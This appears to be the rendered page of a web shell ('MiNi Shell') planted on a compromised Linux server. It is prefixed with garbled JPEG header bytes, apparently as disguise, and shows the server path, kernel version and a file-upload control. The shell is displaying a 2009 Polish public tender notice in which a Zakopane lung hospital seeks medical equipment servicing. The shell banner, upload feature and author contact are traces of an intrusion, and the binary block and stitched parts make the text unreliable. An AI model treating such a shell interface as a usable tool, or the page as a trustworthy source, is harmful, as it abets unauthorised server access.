JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090810/272124-N-2009.html

<p class="kh_header"><b>Zakopane: przegląd i konserwacja sprzętu medycznego  -A.ZP/4b/09</b><br>
<b>Numer ogłoszenia: 272124 - 2009; data zamieszczenia: 10.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Specjalistyczny Chorób Płuc im. dr O. Sokołowskiego , ul. Gładkie 1, 34-500 Zakopane, woj. małopolskie, tel. 018 2015045, faks 018 2014632.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalsokolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przegląd i konserwacja sprzętu medycznego  -A.ZP/4b/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi polegającej na wykonywaniu okresowych przeglądów technicznych i  konserwacji  sprzętu oraz aparatury medycznej znajdujących się w Samodzielnym Publicznym Specjalistycznym Szpitalu Chorób Płuc w Zakopanem. Wykaz sprzętu i aparatury medycznej objętej przedmiotową usługą  znajduje się  w zał. nr 1 do  specyfikacji.
2. Przedmiotowa usługa  obejmuje:
-	wykonanie: kwartalnych/półrocznych/ rocznych czynności konserwacyjno- przeglądowych,
-	nadzór techniczny nad powierzonym sprzętem,
-	wystawienie raportu serwisowego i wpis do dokumentacji eksploatacji sprzętu ( paszportu technicznego) wykonanych czynności,
-	legalizację,
-	kalibrację,
-	sprawdzenie instalacji,
-	ustawienie ( regulację) wymaganych przez producenta parametrów
-	sporządzenie orzeczeń o stanie urządzeń nie nadających się do naprawy,
-	zakres czynności wykonywanych w ramach przeglądów i terminy ich wykonania powinny być zgodne z zaleceniami producenta i obowiązującymi przepisami prawa,

3. Zakończenie usługi przeglądu powinno nastąpić w terminie max 14 dni roboczych od dnia zgłoszenia przez Zamawiającego.

4. W przypadku wyłączenia aparatu/ urządzenia z użytkowania do Wykonawcy należy obowiązek umieszczenia na niesprawnym aparacie/ urządzeniu czytelnej informacji: urządzenie niesprawne- nie używać lub urządzenie przeznaczone do naprawy- nie używać.

5. W cenie za przegląd techniczny Wykonawca musi uwzględnić wszystkie koszty związane z tą usługą, w tym dojazd lub koszt transportu ( koszt przesyłki) aparatury.

6. Przedmiot zamówienia musi być 	realizowany 	zgodnie z wymogami producenta aparatury, sprzętu, obowiązującymi  	normami i odnośnymi przepisami oraz z zachowaniem przepisów BHP i P. Poż. . Usługi będące przedmiotem niniejszego postępowania Wykonawca 	wykona przy użyciu własnej aparatury kontrolno-pomiarowej, narzędzi i materiałów w siedzibie Zamawiającego. W przypadku konieczności wykonania usługi serwisowej w siedzibie Wykonawcy, ewentualny transport aparatów i sprzętu ma być  wkalkulowany w cenę usługi i Zamawiający nie ponosi kosztów tego transportu. 
7. Usługi serwisowe Wykonawca wykonywać będzie na mocy pisemnego zlecenia Zamawiającego- zgodnie z zaleceniami producenta  	aparatury i sprzętu. Zaleca się, aby Wykonawca zdobył wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty i prawidłowego wykonania przedmiotu umowy. Uwaga. Sprzęt i aparatura medyczna w okresie gwarancji zgodnie z zawartą umową z dostawcą podlega przeglądom przez  autoryzowany serwis producenta .
8. Wykonawca zobowiązany jest do wykonania czynności konserwacyjnych i przeglądowych zgodnie z przyjętym harmonogramem wynikającym z właściwości danego sprzętu/ aparatury, obowiązującymi instrukcjami, standardami, normą. 
9. Konieczność przeprowadzenia napraw lub wymiany części zamiennych na nowe Wykonawca będzie uzgadniał z Działem Administracji Zamawiającego z podaniem przewidywanych kosztów. Wykonanie ich nastąpi po akceptacji kosztów przez Kierownika Zamawiającego z uwzględnieniem kosztów roboczogodziny i dojazdu podanych w ofercie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.42.20.00-9, 50.43.00.00-8, 50.80.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Wykonawca musi posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2. Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności:
2.1. Wykonawca składający ofertę musi wykazać, że w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia   wykonał  co najmniej 2 dostawy o charakterze odpowiadającym przedmiotowi zamówienia, z których każda była o wartości co najmniej 80% wartości złożonej oferty;  
2.2.Wykonawca musi dysponować osobą/osobami, które posiadają  uprawnienia do prowadzenia obsługi serwisowej aparatury medycznej wyszczególnionej w opisie przedmiotu zamówienia; 
3. Wykonawca musi znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. O udzielenie zamówienia może ubiegać się wykonawca, który nie podlega wykluczeniu z postępowania o udzielenie zamówienia.

Ocena spełnienia powyższych warunków będzie dokonywana metodą 0 - 1, tj. spełnia lub nie spełnia,   w oparciu o dokumenty i  oświadczenia dołączone do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2.	podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące załącznik nr  3  do  specyfikacji.
3.	wykaz wykonanych, a w przypadku  świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia (co najmniej 2 usługi o charakterze odpowiadającym przedmiotowi zamówienia, z których każda była o wartości co najmniej 80% wartości złożonej oferty), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie; ( należy wypełnić załącznik nr 4 do specyfikacji);
4.	wykaz osób i podmiotów, którymi dysponuje lub będzie dysponował Wykonawca i które  będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności ( należy wypełnić załącznik nr 6 do siwz). Do ww. wykazu należy dołączyć certyfikat/certyfikaty ( świadectwa) poświadczające ukończenie specjalistycznego przeszkolenia w zakresie obsługi serwisowej aparatury wyszczególnionej w opisie przedmiotu zamówienia (przez min. jedną osobę) lub inny dokument uprawniający do świadczenia usług serwisowych objętych przedmiotem zamówienia
      lub
5.	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 4 wykonawca wskazał osoby, którymi będzie dysponował;
6.	oryginał pełnomocnictwa (pełnomocnictw), jeżeli oferta będzie podpisana przez pełnomocnika;
7.	wypełniony formularz oferty stanowiący załącznik nr 2 do specyfikacji (wykonawca może złożyć ofertę na własnym formularzu, lecz jej treść musi być zgodna z treścią  formularza załączonego do specyfikacji);
8.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające że  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
9.	Dokument o którym mowa w pkt 8 powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
10.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w pkt 8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.
11.	Dokumenty mogą być przedstawione w formie kopii (kserokopii) poświadczonych za zgodność z oryginałem przez wykonawcę.
12.	Jeżeli złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości, Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu.
13.	Dokumenty sporządzone w języku obcym mają być składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę. 

Oferta składana przez więcej niż jednego wykonawcę:
-	Wykonawcy mogą wspólnie ubiegać się o udzielenie za?mó?wie?nia.
-	Wykonawcy występujący wspólnie ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu  i zawarcia umowy w sprawie zamówienia publicznego. Dokument pełnomocnictwa powinien być podpisany przez wszystkich wykonawców. Pełnomocnictwo należy dołączyć do oferty.
-	Wykonawcy, składający ofertę wspólnie, ponoszą solidarną odpowiedzialność za wykonanie umowy.
-	W odniesieniu do wymagań postawionych przez zamawiającego, każdy z wykonawców oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 24 ust.1 i 2  i spełnia wymogi  art.22 ust.1 ustawy. W zakresie warunku określonego w pkt III.2  (opis warunków) ppkt 2 wykonawcy wspólnie ( co najmniej jeden z nich) mają udowodnić, iż spełniają ten warunek.
- Dokumenty na potwierdzenie spełnienia warunków udziału w postępowaniu wskazane w pkt  1, 2, 8 muszą być złożone odrębnie przez każdego z wykonawców
-	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  wykonawców występujących wspólnie,
- Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z  wykonawcą  występującym jako  pełnomocnik  pozostałych ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpitalsokolowski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Specjalistyczny Chorób Płuc 
im. dr  O. Sokołowskiego 
ul. Gładkie 1
34-500 Zakopane
Sekretariat pok. 03.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 09:00, miejsce: Samodzielny Publiczny Szpital Specjalistyczny Chorób Płuc 
im. dr  O. Sokołowskiego 
ul. Gładkie 1
34-500 Zakopane
Sekretariat pok. 03.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu i aparatury medycznej myjnia automatyczna 2 szt. źródło światła 2 szt. procesor 2 szt. bronchofiberoskop 3 szt. bronchoskop 5 szt. gastroskop 3 szt. mikroskop 2 szt. videokolonoskop 1 szt. sigmoidoskop 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu i aparatury medycznej : Generator elektrochirurgiczny 2 szt. system podgrzewania pacjenta 2 szt. podgrzewacz do płynów 2 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.20.00-9, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu i aparatury medycznej: videotorakoskop 2 szt. telecam kamera 1 szt. tubus ezofagoskopu 1 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.43.00.00-8, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego sterylizator plazmowy 1 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego procesor tkankowy 1 szt. mikrotom 1 szt. kriostat 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego macerator 2 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego spirometr MASTERSCOPE 1 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego coolscope 1 szt. mikroskop Nikon ECLIPSE+ kamera 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego analizator stanów krytycznych 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego Gazometr CIBA 1 szt. Analizator fonoselektywny Rapidchem 744 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego respirator BEAR 1000 1 szt. ultrasonograf 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.80.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> nie dotyczy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przegląd techniczny sprzętu medycznego aparat kriochirurgiczny CRYO 1 szt...</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.20.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com